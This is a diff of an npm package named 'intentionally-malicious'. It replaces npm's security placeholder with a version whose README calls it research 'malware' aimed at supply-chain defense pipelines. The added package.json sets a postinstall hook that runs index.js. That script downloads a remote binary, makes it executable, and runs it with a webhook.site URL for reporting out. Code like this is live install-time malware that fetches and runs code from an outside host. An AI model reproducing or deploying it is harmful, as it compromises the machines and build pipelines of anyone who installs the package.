intentionally-malicious 0.0.1-security → 1.0.1

package/README.md

@@ -1,5 +1,7 @@
-# Security holding package
+# Intentionally Malicious
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+This is a package wrapper of "malware" that executes inside supply chain defense pipelines to
+test for SSRF opportunities, done by [@ex0dus-0x](https://codemuch.tech).
+Please reach out to chat more if this entered your pipeline!
 
-Please refer to www.npmjs.com/advisories?search=intentionally-malicious for more information.
+The original malware: https://github.com/ex0dus-0x/sneak

package/index.js

@@ -0,0 +1,24 @@
+const request = require('request');
+const fs = require('fs');
+const exec = require('child_process').exec;
+
+const url = "https://github.com/ex0dus-0x/sneak/releases/download/prerelease/sneak"
+const file = fs.createWriteStream("sneak");
+request({
+  followAllRedirects: true,
+  url: url
+}, function (error, response, body) {
+  request(url).pipe(file).on('close', function() {
+	console.log("done");
+    exec('chmod +x ./sneak && ./sneak -webhook=https://webhook.site/646059aa-6165-44dd-bc5b-143f0e13cdc3?', (err, stdout, stderr) => {
+      if (err) {
+          console.log(err);
+          return;
+      }
+      console.log(`stdout: ${stdout}`);
+      console.log(`stderr: ${stderr}`);
+    });
+  });
+});
+
+

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "intentionally-malicious",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.1",
+  "description": "Definitely malware.",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node index.js"
+  },
+  "author": "Alan Cao <alcao758@gmail.com>",
+  "license": "ISC",
+  "dependencies": {
+    "request": "^2.88.2"
+  }
 }